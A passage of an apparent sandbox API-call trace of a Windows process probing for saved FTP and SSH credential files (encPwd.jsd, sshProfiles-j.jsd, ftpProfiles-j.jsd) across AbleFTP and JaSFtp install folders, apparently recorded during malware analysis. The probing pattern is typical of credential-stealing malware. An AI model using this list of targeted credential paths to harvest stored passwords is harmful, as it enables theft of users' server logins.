(lpLibFileName="shlwapi") returned 0x77680000 [0314.053] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 0 [0314.054] GetProcessHeap () returned 0x780000 [0314.054] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.054] GetProcessHeap () returned 0x780000 [0314.054] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.055] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.056] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.056] GetProcessHeap () returned 0x780000 [0314.056] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.056] GetProcessHeap () returned 0x780000 [0314.056] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.057] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.057] GetProcessHeap () returned 0x780000 [0314.058] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.058] GetProcessHeap () returned 0x780000 [0314.058] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.058] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.059] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.059] GetProcessHeap () returned 0x780000 [0314.059] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.059] GetProcessHeap () returned 0x780000 [0314.060] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.061] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.061] GetProcessHeap () returned 0x780000 [0314.062] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.062] GetProcessHeap () returned 0x780000 [0314.062] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.062] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.063] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 43 [0314.063] GetProcessHeap () returned 0x780000 [0314.063] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.063] GetProcessHeap () returned 0x780000 [0314.064] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.065] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 0 [0314.065] GetProcessHeap () returned 0x780000 [0314.066] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.066] GetProcessHeap () returned 0x780000 [0314.066] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.066] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.067] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.067] GetProcessHeap () returned 0x780000 [0314.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.067] GetProcessHeap () returned 0x780000 [0314.068] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.069] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.069] GetProcessHeap () returned 0x780000 [0314.069] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.069] GetProcessHeap () returned 0x780000 [0314.069] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.070] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.071] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.071] GetProcessHeap () returned 0x780000 [0314.071] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.071] GetProcessHeap () returned 0x780000 [0314.071] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.072] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.072] GetProcessHeap () returned 0x780000 [0314.073] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.073] GetProcessHeap () returned 0x780000 [0314.073] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.074] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.074] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 41 [0314.074] GetProcessHeap () returned 0x780000 [0314.074] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x56) returned 0x798dd8 [0314.074] GetProcessHeap () returned 0x780000 [0314.075] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.076] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 0 [0314.076] GetProcessHeap () returned 0x780000 [0314.076] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.076] GetProcessHeap () returned 0x780000 [0314.076] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.077] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.078] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 62 [0314.078] GetProcessHeap () returned 0x780000 [0314.078] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0314.078] GetProcessHeap () returned 0x780000 [0314.078] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.079] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.080] GetProcessHeap () returned 0x780000 [0314.080] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.080] GetProcessHeap () returned 0x780000 [0314.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.081] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.081] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0314.081] GetProcessHeap () returned 0x780000 [0314.081] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0314.082] GetProcessHeap () returned 0x780000 [0314.082] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.083] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.083] GetProcessHeap () returned 0x780000 [0314.083] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.083] GetProcessHeap () returned 0x780000 [0314.083] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.084] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.085] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 41 [0314.085] GetProcessHeap () returned 0x780000 [0314.085] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x56) returned 0x798dd8 [0314.085] GetProcessHeap () returned 0x780000 [0314.085] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.086] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 0 [0314.086] GetProcessHeap () returned 0x780000 [0314.087] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.087] GetProcessHeap () returned 0x780000 [0314.087] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.087] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.088] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 62 [0314.088] GetProcessHeap () returned 0x780000 [0314.088] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0314.088] GetProcessHeap () returned 0x780000 [0314.089] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.093] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.093] GetProcessHeap () returned 0x780000 [0314.094] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.094] GetProcessHeap () returned 0x780000 [0314.094] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.095] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.095] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0314.095] GetProcessHeap () returned 0x780000 [0314.095] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0314.095] GetProcessHeap () returned 0x780000 [0314.096] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.097] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.097] GetProcessHeap () returned 0x780000 [0314.098] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.098] GetProcessHeap () returned 0x780000 [0314.098] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.099] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.100] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 41 [0314.100] GetProcessHeap () returned 0x780000 [0314.100] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x56) returned 0x798dd8 [0314.100] GetProcessHeap () returned 0x780000 [0314.100] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.101] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 0 [0314.102] GetProcessHeap () returned 0x780000 [0314.102] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.102] GetProcessHeap () returned 0x780000 [0314.102] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.103] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.104] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 62 [0314.104] GetProcessHeap () returned 0x780000 [0314.104] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0314.104] GetProcessHeap () returned 0x780000 [0314.105] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.106] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.106] GetProcessHeap () returned 0x780000 [0314.107] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.107] GetProcessHeap () returned 0x780000 [0314.107] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.107] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.108] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0314.108] GetProcessHeap () returned 0x780000 [0314.108] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0314.108] GetProcessHeap () returned 0x780000 [0314.109] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.109] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.109] GetProcessHeap () returned 0x780000 [0314.110] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.110] GetProcessHeap () returned 0x780000 [0314.110] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.110] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.111] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 42 [0314.111] GetProcessHeap () returned 0x780000 [0314.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.111] GetProcessHeap () returned 0x780000 [0314.111] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.112] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 0 [0314.112] GetProcessHeap () returned 0x780000 [0314.113] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.113] GetProcessHeap () returned 0x780000 [0314.113] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.113] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.114] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 63 [0314.114] GetProcessHeap () returned 0x780000 [0314.114] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.114] GetProcessHeap () returned 0x780000 [0314.114] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.115] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.115] GetProcessHeap () returned 0x780000 [0314.115] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.116] GetProcessHeap () returned 0x780000 [0314.116] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.116] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.117] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0314.117] GetProcessHeap () returned 0x780000 [0314.117] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.117] GetProcessHeap () returned 0x780000 [0314.117] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.118] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.118] GetProcessHeap () returned 0x780000 [0314.118] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.118] GetProcessHeap () returned 0x780000 [0314.118] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.119] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.120] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 42 [0314.120] GetProcessHeap () returned 0x780000 [0314.120] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.120] GetProcessHeap () returned 0x780000 [0314.120] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.121] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 0 [0314.121] GetProcessHeap () returned 0x780000 [0314.122] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.122] GetProcessHeap () returned 0x780000 [0314.122] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.122] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.123] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 63 [0314.123] GetProcessHeap () returned 0x780000 [0314.123] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.123] GetProcessHeap () returned 0x780000 [0314.123] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.124] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.125] GetProcessHeap () returned 0x780000 [0314.125] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.125] GetProcessHeap () returned 0x780000 [0314.125] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.126] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.126] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0314.126] GetProcessHeap () returned 0x780000 [0314.126] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.126] GetProcessHeap () returned 0x780000 [0314.127] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.128] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.128] GetProcessHeap () returned 0x780000 [0314.128] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.128] GetProcessHeap () returned 0x780000 [0314.128] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.129] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.130] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 42 [0314.130] GetProcessHeap () returned 0x780000 [0314.130] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.130] GetProcessHeap () returned 0x780000 [0314.130] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.131] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 0 [0314.131] GetProcessHeap () returned 0x780000 [0314.132] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.132] GetProcessHeap () returned 0x780000 [0314.132] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.132] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.133] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 63 [0314.133] GetProcessHeap () returned 0x780000 [0314.133] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.133] GetProcessHeap () returned 0x780000 [0314.134] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.135] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.135] GetProcessHeap () returned 0x780000 [0314.135] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.135] GetProcessHeap () returned 0x780000 [0314.136] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.144] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.145] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0314.145] GetProcessHeap () returned 0x780000 [0314.145] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.145] GetProcessHeap () returned 0x780000 [0314.145] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.147] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.147] GetProcessHeap () returned 0x780000 [0314.148] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.148] GetProcessHeap () returned 0x780000 [0314.148] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.149] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.150] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 42 [0314.150] GetProcessHeap () returned 0x780000 [0314.150] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.150] GetProcessHeap () returned 0x780000 [0314.151] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.152] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 0 [0314.153] GetProcessHeap () returned 0x780000 [0314.153] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.153] GetProcessHeap () returned 0x780000 [0314.153] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.154] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.155] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 63 [0314.155] GetProcessHeap () returned 0x780000 [0314.155] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.155] GetProcessHeap () returned 0x780000 [0314.157] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.158] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.159] GetProcessHeap () returned 0x780000 [0314.159] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.159] GetProcessHeap () returned 0x780000 [0314.159] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.160] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.162] wvsprintfW (in: param_1=0x79b318, 